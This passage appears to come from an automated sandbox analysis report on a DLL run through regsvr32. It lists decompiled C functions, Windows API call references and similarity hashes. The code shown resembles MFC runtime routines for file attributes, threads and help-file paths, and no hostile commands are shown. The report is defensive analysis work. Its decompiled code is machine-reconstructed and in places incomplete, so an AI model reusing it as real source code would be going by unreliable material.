                                                                                                                APIs
                                                                                                                  • Part of subcall function 10026F7E: LoadCursorA.USER32 ref: 10026F9A
                                                                                                                  • Part of subcall function 10026F7E: LoadCursorA.USER32 ref: 10026FB3
                                                                                                                • PeekMessageA.USER32(?,?,00000367,00000367,00000003), ref: 10027315
                                                                                                                • PostMessageA.USER32(?,00000111,0000E145,00000000), ref: 1002736E
                                                                                                                • SendMessageA.USER32 ref: 1002738D
                                                                                                                • GetCursorPos.USER32(?), ref: 100273A8
                                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 100273D4
                                                                                                                • ReleaseCapture.USER32 ref: 1002741B
                                                                                                                • SetCapture.USER32(?), ref: 10027420
                                                                                                                • ReleaseCapture.USER32 ref: 1002742C
                                                                                                                • SendMessageA.USER32 ref: 10027440
                                                                                                                • SendMessageA.USER32 ref: 1002746B
                                                                                                                • PostMessageA.USER32(?,0000036A,00000000,00000000), ref: 10027489
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$CaptureCursorSend$LoadPeekPostRelease
                                                                                                                • String ID:
                                                                                                                • API String ID: 291007519-0
                                                                                                                • Opcode ID: 58d805fa35646992badd47a243349e5d7ac1a53d3c35ea07d94da2f8a3553d6b
                                                                                                                • Instruction ID: c30bbffdb3fe4ae6972bf7ce15c5940e6a562e61142bcdf2c6550b1aac08a7c5
                                                                                                                • Opcode Fuzzy Hash: 58d805fa35646992badd47a243349e5d7ac1a53d3c35ea07d94da2f8a3553d6b
                                                                                                                • Instruction Fuzzy Hash: AC51AFB1A00609EFEB11EFA1DC84DAEBBB9FF44344F514569F686A62A0D730AD40DF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 96%
                                                                                                                			E10039102(CHAR* _a4, signed int* _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				FILETIME* _v12;
                                                                                                                				FILETIME* _v16;
                                                                                                                				char _v24;
                                                                                                                				char _v32;
                                                                                                                				struct _FILETIME _v40;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				long _t40;
                                                                                                                				long _t41;
                                                                                                                				long _t43;
                                                                                                                				signed int* _t47;
                                                                                                                				void* _t70;
                                                                                                                				void* _t83;
                                                                                                                				signed int* _t84;
                                                                                                                				void* _t85;
                                                                                                                
                                                                                                                				_t70 = 0;
                                                                                                                				_v16 = 0;
                                                                                                                				_v12 = 0;
                                                                                                                				_t40 = GetFileAttributesA(_a4);
                                                                                                                				_t82 = GetLastError;
                                                                                                                				_v8 = _t40;
                                                                                                                				if(_t40 == 0xffffffff) {
                                                                                                                					E10034B40(0, GetLastError, _t83, _t85, GetLastError(), _a4);
                                                                                                                				}
                                                                                                                				_t84 = _a8;
                                                                                                                				_t41 = _t84[8] & 0x000000ff;
                                                                                                                				if(_t41 != _v8 && (_v8 & 0x00000001) != 0 && SetFileAttributesA(_a4, _t41) == 0) {
                                                                                                                					E10034B40(_t70, _t82, _t84, _t85, GetLastError(), _a4);
                                                                                                                				}
                                                                                                                				_t42 =  &(_t84[2]);
                                                                                                                				if((_t84[2] | _t84[3]) != 0) {
                                                                                                                					E10039067(_t70,  &_v40, _t82, _t84, _t42,  &_v40);
                                                                                                                					_t47 =  &(_t84[4]);
                                                                                                                					_t77 =  *_t47 | _t47[1];
                                                                                                                					if(( *_t47 | _t47[1]) != 0) {
                                                                                                                						E10039067(_t70,  &_v24, _t82, _t84, _t47,  &_v24);
                                                                                                                						_pop(_t77);
                                                                                                                						_v12 =  &_v24;
                                                                                                                					}
                                                                                                                					if(( *_t84 | _t84[1]) != 0) {
                                                                                                                						E10039067(_t70, _t77, _t82, _t84, _t84,  &_v32);
                                                                                                                						_v16 =  &_v32;
                                                                                                                					}
                                                                                                                					_t70 = CreateFileA(_a4, 0xc0000000, 1, _t70, 3, 0x80, _t70);
                                                                                                                					if(_t70 == 0xffffffff) {
                                                                                                                						E10034B40(_t70, _t82, _t84, _t85, GetLastError(), _a4);
                                                                                                                					}
                                                                                                                					if(SetFileTime(_t70, _v16, _v12,  &_v40) == 0) {
                                                                                                                						E10034B40(_t70, _t82, _t84, _t85, GetLastError(), _a4);
                                                                                                                					}
                                                                                                                					if(CloseHandle(_t70) == 0) {
                                                                                                                						E10034B40(_t70, _t82, _t84, _t85, GetLastError(), _a4);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t43 = _t84[8] & 0x000000ff;
                                                                                                                				if(_t43 == _v8 || (_v8 & 0x00000001) != 0) {
                                                                                                                					L21:
                                                                                                                					return _t43;
                                                                                                                				} else {
                                                                                                                					_t43 = SetFileAttributesA(_a4, _t43);
                                                                                                                					if(_t43 != 0) {
                                                                                                                						goto L21;
                                                                                                                					}
                                                                                                                					return E10034B40(_t70, _t82, _t84, _t85, GetLastError(), _a4);
                                                                                                                				}
                                                                                                                			}






















                                                                                                                APIs
                                                                                                                • GetFileAttributesA.KERNEL32(?), ref: 10039116
                                                                                                                • GetLastError.KERNEL32(?), ref: 1003912D
                                                                                                                • SetFileAttributesA.KERNEL32(?,?), ref: 1003914B
                                                                                                                • GetLastError.KERNEL32(?), ref: 10039158
                                                                                                                • CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000), ref: 100391C2
                                                                                                                • GetLastError.KERNEL32(?), ref: 100391D2
                                                                                                                • SetFileTime.KERNEL32(00000000,?,?,?), ref: 100391E5
                                                                                                                • GetLastError.KERNEL32(?), ref: 100391F2
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 100391FB
                                                                                                                • GetLastError.KERNEL32(?), ref: 10039208
                                                                                                                • SetFileAttributesA.KERNEL32(?,?), ref: 10039223
                                                                                                                • GetLastError.KERNEL32(?), ref: 10039230
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$File$Attributes$CloseCreateHandleTime
                                                                                                                • String ID:
                                                                                                                • API String ID: 3867745407-0
                                                                                                                • Opcode ID: faeb73b13b030793cdfe3c5e2e502381dc07066af650f089bbbf1ff9eb0d01bc
                                                                                                                • Instruction ID: 7f419f033f1c2a31a84a6146d95747ac909fd2f0a9a0dff047200850bf0561e9
                                                                                                                • Opcode Fuzzy Hash: faeb73b13b030793cdfe3c5e2e502381dc07066af650f089bbbf1ff9eb0d01bc
                                                                                                                • Instruction Fuzzy Hash: 97415B75900249BFDB12DFA1CD89EDEBBFCEF04392F118455F855AA0A1DB34EA40DA20
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1001A8AD(intOrPtr __ecx, void* __edx, signed char _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				void* _v12;
                                                                                                                				void* _v16;
                                                                                                                				signed int _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				char _v32;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				void* _t41;
                                                                                                                				void* _t55;
                                                                                                                				void* _t56;
                                                                                                                				intOrPtr _t59;
                                                                                                                
                                                                                                                				_t55 = __edx;
                                                                                                                				_t59 = __ecx;
                                                                                                                				_t63 =  *((intOrPtr*)(__ecx + 0x2c));
                                                                                                                				if( *((intOrPtr*)(__ecx + 0x2c)) != 0) {
                                                                                                                					E1000A069(0, __ecx, _t56, __ecx, _t63);
                                                                                                                				}
                                                                                                                				E10049170(_t56,  &_v32, 0, 0x1c);
                                                                                                                				_v32 = E1001DD4F(0, _t56, _t59, _t63);
                                                                                                                				_v28 = _t59;
                                                                                                                				_v16 = CreateEventA(0, 1, 0, 0);
                                                                                                                				_v12 = CreateEventA(0, 1, 0, 0);
                                                                                                                				_t35 = _a4;
                                                                                                                				_v24 = _a4;
                                                                                                                				if(_v16 == 0) {
                                                                                                                					L11:
                                                                                                                					__eflags = _v12;
                                                                                                                					if(_v12 == 0) {
                                                                                                                						goto L13;
                                                                                                                					}
                                                                                                                					goto L12;
                                                                                                                				} else {
                                                                                                                					if(_v12 == 0) {
                                                                                                                						CloseHandle(_v16);
                                                                                                                						goto L11;
                                                                                                                					}
                                                                                                                					_t41 = E1004C95A(_t55, _a12, _a8, E1001A795,  &_v32, _t35 | 0x00000004, _t59 + 0x30);
                                                                                                                					 *(_t59 + 0x2c) = _t41;
                                                                                                                					if(_t41 == 0) {
                                                                                                                						L13:
                                                                                                                						return 0;
                                                                                                                					}
                                                                                                                					ResumeThread(_t41);
                                                                                                                					WaitForSingleObject(_v16, 0xffffffff);
                                                                                                                					CloseHandle(_v16);
                                                                                                                					if((_a4 & 0x00000004) != 0) {
                                                                                                                						SuspendThread( *(_t59 + 0x2c));
                                                                                                                					}
                                                                                                                					if(_v8 == 0) {
                                                                                                                						SetEvent(_v12);
                                                                                                                						return 1;
                                                                                                                					} else {
                                                                                                                						WaitForSingleObject( *(_t59 + 0x2c), 0xffffffff);
                                                                                                                						CloseHandle( *(_t59 + 0x2c));
                                                                                                                						 *(_t59 + 0x2c) = 0;
                                                                                                                						L12:
                                                                                                                						CloseHandle(_v12);
                                                                                                                						goto L13;
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}


















                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 1001A8CB
                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1001A8E9
                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1001A8F3
                                                                                                                • ResumeThread.KERNEL32(00000000), ref: 1001A935
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1001A940
                                                                                                                • CloseHandle.KERNEL32(?), ref: 1001A949
                                                                                                                • SuspendThread.KERNEL32(?), ref: 1001A954
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1001A964
                                                                                                                • CloseHandle.KERNEL32(?), ref: 1001A96D
                                                                                                                • CloseHandle.KERNEL32(?), ref: 1001A98F
                                                                                                                  • Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
                                                                                                                  • Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A
                                                                                                                • SetEvent.KERNEL32(00000004), ref: 1001A977
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseEventHandle$CreateObjectSingleThreadWait$Exception@8H_prolog3ResumeSuspendThrow_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3256170895-0
                                                                                                                • Opcode ID: 9049e03c2b06ccf8a3b8e1e327f9b879ebdf1785fe53997139be18a3708e4347
                                                                                                                • Instruction ID: 1bca54e72f4ae1e8fd6b423ebf6d5296896c1588f7da4133b7cdabd0e7a60bac
                                                                                                                • Opcode Fuzzy Hash: 9049e03c2b06ccf8a3b8e1e327f9b879ebdf1785fe53997139be18a3708e4347
                                                                                                                • Instruction Fuzzy Hash: 5E315A72C00209BFDB01AFE5CC849AEBBF9FF06394B21866AF116A5060D77499D18F60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 62%
                                                                                                                			E10034554(void* __ecx, void* __edx, void* __eflags, char _a132, char _a392, signed int _a652, char _a656) {
                                                                                                                				char _v124;
                                                                                                                				char* _v128;
                                                                                                                				char _v660;
                                                                                                                				char _v804;
                                                                                                                				char _v812;
                                                                                                                				char _v820;
                                                                                                                				intOrPtr _v832;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t44;
                                                                                                                				char* _t53;
                                                                                                                				char* _t57;
                                                                                                                				void* _t59;
                                                                                                                				intOrPtr _t73;
                                                                                                                				void* _t76;
                                                                                                                				char* _t79;
                                                                                                                				char* _t81;
                                                                                                                				char* _t84;
                                                                                                                				void* _t87;
                                                                                                                				void* _t89;
                                                                                                                				void* _t90;
                                                                                                                				intOrPtr _t93;
                                                                                                                				void* _t94;
                                                                                                                				void* _t95;
                                                                                                                				void* _t96;
                                                                                                                				void* _t97;
                                                                                                                				void* _t99;
                                                                                                                				void* _t100;
                                                                                                                				signed int _t102;
                                                                                                                				void* _t105;
                                                                                                                				void* _t106;
                                                                                                                				void* _t108;
                                                                                                                				void* _t109;
                                                                                                                
                                                                                                                				_t94 = __edx;
                                                                                                                				_t90 = __ecx;
                                                                                                                				_t102 =  &_v660;
                                                                                                                				_t109 = _t108 - 0x310;
                                                                                                                				_t44 =  *0x100b9e70; // 0xbb35530
                                                                                                                				_a652 = _t44 ^ _t102;
                                                                                                                				_push(_t87);
                                                                                                                				_push(_t95);
                                                                                                                				_t99 = __ecx;
                                                                                                                				_t96 = E1001E302(_t87, _t95, __ecx, __eflags);
                                                                                                                				 *(_t96 + 8) =  *(_t99 + 0x44);
                                                                                                                				 *(_t96 + 0xc) =  *(_t99 + 0x44);
                                                                                                                				if(GetModuleFileNameA( *(_t99 + 0x44),  &_a392, 0x104) == 0) {
                                                                                                                					L7:
                                                                                                                					E1000C2FB(_t90);
                                                                                                                				} else {
                                                                                                                					__eflags = __eax - 0x104;
                                                                                                                					if(__eax == 0x104) {
                                                                                                                						goto L7;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t53 = PathFindExtensionA( &_a392);
                                                                                                                				__eflags = _t53;
                                                                                                                				_v128 = _t53;
                                                                                                                				if(_t53 == 0) {
                                                                                                                					E1000C2FB(_t90);
                                                                                                                				}
                                                                                                                				 *_v128 = 0;
                                                                                                                				_t57 = E10034516( &_a392,  &_a132, 0x104);
                                                                                                                				__eflags = _t57;
                                                                                                                				if(_t57 != 0) {
                                                                                                                					E1000C2FB(_t90);
                                                                                                                				}
                                                                                                                				__eflags =  *(_t99 + 0x60);
                                                                                                                				if( *(_t99 + 0x60) != 0) {
                                                                                                                					L15:
                                                                                                                					_t58 =  *(_t99 + 0x50);
                                                                                                                					__eflags = _t58;
                                                                                                                					if(_t58 != 0) {
                                                                                                                						L20:
                                                                                                                						 *(_t96 + 0x10) = _t58;
                                                                                                                						__eflags =  *(_t99 + 0x64);
                                                                                                                						if( *(_t99 + 0x64) != 0) {
                                                                                                                							L26:
                                                                                                                							__eflags =  *(_t99 + 0x68);
                                                                                                                							if( *(_t99 + 0x68) != 0) {
                                                                                                                								L28:
                                                                                                                								_pop(_t97);
                                                                                                                								_pop(_t100);
                                                                                                                								_pop(_t89);
                                                                                                                								_t59 = E1004763E(_t58, _t89, _a652 ^ _t102, _t94, _t97, _t100);
                                                                                                                								__eflags =  &_a656;
                                                                                                                								return _t59;
                                                                                                                							} else {
                                                                                                                								_push(E1004D00F(_t94,  &_a132, 0x104, ".INI"));
                                                                                                                								L1000135C(0x104, _t90, _t96, _t99);
                                                                                                                								_t58 = E1004C810( &_a132);
                                                                                                                								_t109 = _t109 + 0x14;
                                                                                                                								__eflags = _t58;
                                                                                                                								 *(_t99 + 0x68) = _t58;
                                                                                                                								if(_t58 == 0) {
                                                                                                                									goto L14;
                                                                                                                								} else {
                                                                                                                									goto L28;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							_t76 =  &_a652 - _v128;
                                                                                                                							__eflags =  *((intOrPtr*)(_t99 + 0x6c)) - 1;
                                                                                                                							if( *((intOrPtr*)(_t99 + 0x6c)) != 1) {
                                                                                                                								_push(".HLP");
                                                                                                                							} else {
                                                                                                                								_push(".CHM");
                                                                                                                							}
                                                                                                                							_push(_t76);
                                                                                                                							_push(_v128);
                                                                                                                							E10019530(0x104, _t94, _t96, _t99, _t102);
                                                                                                                							_t109 = _t109 + 0xc;
                                                                                                                							_t79 = E1004C810( &_a392);
                                                                                                                							__eflags = _t79;
                                                                                                                							_pop(_t90);
                                                                                                                							 *(_t99 + 0x64) = _t79;
                                                                                                                							if(_t79 == 0) {
                                                                                                                								goto L14;
                                                                                                                							} else {
                                                                                                                								_t58 = _v128;
                                                                                                                								 *_v128 = 0;
                                                                                                                								goto L26;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_t81 = E1001FA58(0x104, _t90, _t96, _t99, _t102, 0xe000,  &_v124, 0x100);
                                                                                                                						__eflags = _t81;
                                                                                                                						if(_t81 == 0) {
                                                                                                                							_push( *(_t99 + 0x60));
                                                                                                                						} else {
                                                                                                                							_push( &_v124);
                                                                                                                						}
                                                                                                                						_t58 = E1004C810();
                                                                                                                						__eflags = _t58;
                                                                                                                						 *(_t99 + 0x50) = _t58;
                                                                                                                						_pop(_t90);
                                                                                                                						if(_t58 == 0) {
                                                                                                                							goto L14;
                                                                                                                						} else {
                                                                                                                							goto L20;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t84 = E1004C810( &_a132);
                                                                                                                					__eflags = _t84;
                                                                                                                					_pop(_t90);
                                                                                                                					 *(_t99 + 0x60) = _t84;
                                                                                                                					if(_t84 != 0) {
                                                                                                                						goto L15;
                                                                                                                					} else {
                                                                                                                						L14:
                                                                                                                						_push(_t102);
                                                                                                                						_t105 = _t109;
                                                                                                                						_push(_t90);
                                                                                                                						_v804 = 0x100b84e8;
                                                                                                                						L10048E48( &_v804, 0x100afe38);
                                                                                                                						asm("int3");
                                                                                                                						_push(_t105);
                                                                                                                						_t106 = _t109;
                                                                                                                						_push(_t90);
                                                                                                                						_v812 = 0x100b8580;
                                                                                                                						L10048E48( &_v812, 0x100afeec);
                                                                                                                						asm("int3");
                                                                                                                						_push(_t106);
                                                                                                                						_push(_t90);
                                                                                                                						_v820 = 0x100b8618;
                                                                                                                						L10048E48( &_v820, 0x100aff30);
                                                                                                                						asm("int3");
                                                                                                                						_push(4);
                                                                                                                						E1004764D(0x1008dd26, 0x104, _t96, _t99);
                                                                                                                						_t93 = E10020454(0x104);
                                                                                                                						_v832 = _t93;
                                                                                                                						_t73 = 0;
                                                                                                                						_v820 = 0;
                                                                                                                						if(_t93 != 0) {
                                                                                                                							_t73 = E1001DB72(_t93);
                                                                                                                						}
                                                                                                                						return E10047725(_t73);
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}







































                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __strdup$ExtensionFileFindModuleNamePath_strcat_s
                                                                                                                • String ID: .CHM$.HLP$.INI
                                                                                                                • API String ID: 1153805871-4017452060
                                                                                                                • Opcode ID: d898d04734b4185a8928105493eb5070d0a6d0ee8ebb921ca0132d43c241309a
                                                                                                                • Instruction ID: a6efce3dbb9c2253d83b29fb9a4a92cf41fa315539aa0d7df2616f374f526431
                                                                                                                • Opcode Fuzzy Hash: d898d04734b4185a8928105493eb5070d0a6d0ee8ebb921ca0132d43c241309a
                                                                                                                • Instruction Fuzzy Hash: BC416BB95006499FEB61DFB5CC85BCA77E8FF05285F12482AE945DA141EF30FA448B21
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1001D678(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a100) {
                                                                                                                				void* _v8;
                                                                                                                				void* _v20;
                                                                                                                				void* _t16;
                                                                                                                
                                                                                                                				_t16 = __ecx;
                                                                                                                				_a100 = _a100 + __edx;
                                                                                                                			}







                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32), ref: 1001D685
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 1001D6A6
                                                                                                                • GetProcAddress.KERNEL32(ReleaseActCtx), ref: 1001D6B8
                                                                                                                • GetProcAddress.KERNEL32(ActivateActCtx), ref: 1001D6CA
                                                                                                                • GetProcAddress.KERNEL32(DeactivateActCtx), ref: 1001D6DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                • String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                                • API String ID: 667068680-2424895508
                                                                                                                • Opcode ID: 13cae8bc9827f3ed2ee9d65c789eb52e5daba88252a32ef3fd7582a7348d6315
                                                                                                                • Instruction ID: 0cd57485817c8c7c4c622c9ee6dfae91d492b28f6457f0633034de1c6d42f173
                                                                                                                • Opcode Fuzzy Hash: 13cae8bc9827f3ed2ee9d65c789eb52e5daba88252a32ef3fd7582a7348d6315
                                                                                                                • Instruction Fuzzy Hash: 05F0DFBCD0422AEEEB10FB719DC8CC9BEA4EB053447024667E91892260F7349480AE92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 94%
                                                                                                                			E1001BE13(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				signed int _t54;
                                                                                                                				void* _t58;
                                                                                                                				signed int _t59;
                                                                                                                				signed int _t63;
                                                                                                                				signed short _t71;
                                                                                                                				signed int _t84;
                                                                                                                				void* _t94;
                                                                                                                				struct HINSTANCE__* _t96;
                                                                                                                				signed int _t97;
                                                                                                                				void* _t98;
                                                                                                                				signed int _t100;
                                                                                                                				void* _t101;
                                                                                                                				void* _t102;
                                                                                                                
                                                                                                                				_t102 = __eflags;
                                                                                                                				_t94 = __edx;
                                                                                                                				_push(0x24);
                                                                                                                				E10047680(0x1008f04f, __ebx, __edi, __esi);
                                                                                                                				_t100 = __ecx;
                                                                                                                				 *((intOrPtr*)(_t101 - 0x20)) = __ecx;
                                                                                                                				 *(_t101 - 0x1c) =  *(__ecx + 0x60);
                                                                                                                				 *(_t101 - 0x18) =  *(__ecx + 0x5c);
                                                                                                                				_t54 = E1001E302(__ebx, __edi, __ecx, _t102);
                                                                                                                				_t96 =  *(_t54 + 0xc);
                                                                                                                				_t84 = 0;
                                                                                                                				_t103 =  *(_t100 + 0x58);
                                                                                                                				if( *(_t100 + 0x58) != 0) {
                                                                                                                					_t96 =  *(E1001E302(0, _t96, _t100, _t103) + 0xc);
                                                                                                                					_t54 = LoadResource(_t96, FindResourceA(_t96,  *(_t100 + 0x58), 5));
                                                                                                                					 *(_t101 - 0x18) = _t54;
                                                                                                                				}
                                                                                                                				if( *(_t101 - 0x18) != _t84) {
                                                                                                                					_t54 = LockResource( *(_t101 - 0x18));
                                                                                                                					 *(_t101 - 0x1c) = _t54;
                                                                                                                				}
                                                                                                                				if( *(_t101 - 0x1c) != _t84) {
                                                                                                                					_t86 = _t100;
                                                                                                                					 *(_t101 - 0x14) = E1001B932(_t84, _t100, __eflags);
                                                                                                                					E10014092(_t84, _t96, __eflags);
                                                                                                                					 *(_t101 - 0x28) =  *(_t101 - 0x28) & _t84;
                                                                                                                					__eflags =  *(_t101 - 0x14) - _t84;
                                                                                                                					 *(_t101 - 0x2c) = _t84;
                                                                                                                					 *(_t101 - 0x24) = _t84;
                                                                                                                					if(__eflags != 0) {
                                                                                                                						__eflags =  *(_t101 - 0x14) - GetDesktopWindow();
                                                                                                                						if(__eflags != 0) {
                                                                                                                							__eflags = IsWindowEnabled( *(_t101 - 0x14));
                                                                                                                							if(__eflags != 0) {
                                                                                                                								EnableWindow( *(_t101 - 0x14), 0);
                                                                                                                								 *(_t101 - 0x2c) = 1;
                                                                                                                								_t84 = E10012730();
                                                                                                                								__eflags = _t84;
                                                                                                                								 *(_t101 - 0x24) = _t84;
                                                                                                                								if(__eflags != 0) {
                                                                                                                									_t86 = _t84;
                                                                                                                									__eflags =  *((intOrPtr*)( *_t84 + 0x120))();
                                                                                                                									if(__eflags != 0) {
                                                                                                                										_t86 = _t84;
                                                                                                                										__eflags = E1001795E(_t84);
                                                                                                                										if(__eflags != 0) {
                                                                                                                											_t86 = _t84;
                                                                                                                											E10017979(_t84, 0);
                                                                                                                											 *(_t101 - 0x28) = 1;
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                					 *(_t101 - 4) =  *(_t101 - 4) & 0x00000000;
                                                                                                                					E1001628E(_t96, __eflags, _t100);
                                                                                                                					_t58 = E10013FEA(_t84, _t86, _t101,  *(_t101 - 0x14));
                                                                                                                					_push(_t96);
                                                                                                                					_push(_t58);
                                                                                                                					_push( *(_t101 - 0x1c));
                                                                                                                					_t59 = E1001BC23(_t84, _t100, _t94, _t96, _t100, __eflags);
                                                                                                                					_t97 = 0;
                                                                                                                					__eflags = _t59;
                                                                                                                					if(_t59 != 0) {
                                                                                                                						__eflags =  *(_t100 + 0x3c) & 0x00000010;
                                                                                                                						if(( *(_t100 + 0x3c) & 0x00000010) != 0) {
                                                                                                                							_t98 = 4;
                                                                                                                							_t71 = E100177F8(_t100);
                                                                                                                							__eflags = _t71 & 0x00000100;
                                                                                                                							if((_t71 & 0x00000100) != 0) {
                                                                                                                								_t98 = 5;
                                                                                                                							}
                                                                                                                							E10013B72(_t100, _t98);
                                                                                                                							_t97 = 0;
                                                                                                                							__eflags = 0;
                                                                                                                						}
                                                                                                                						__eflags =  *((intOrPtr*)(_t100 + 0x20)) - _t97;
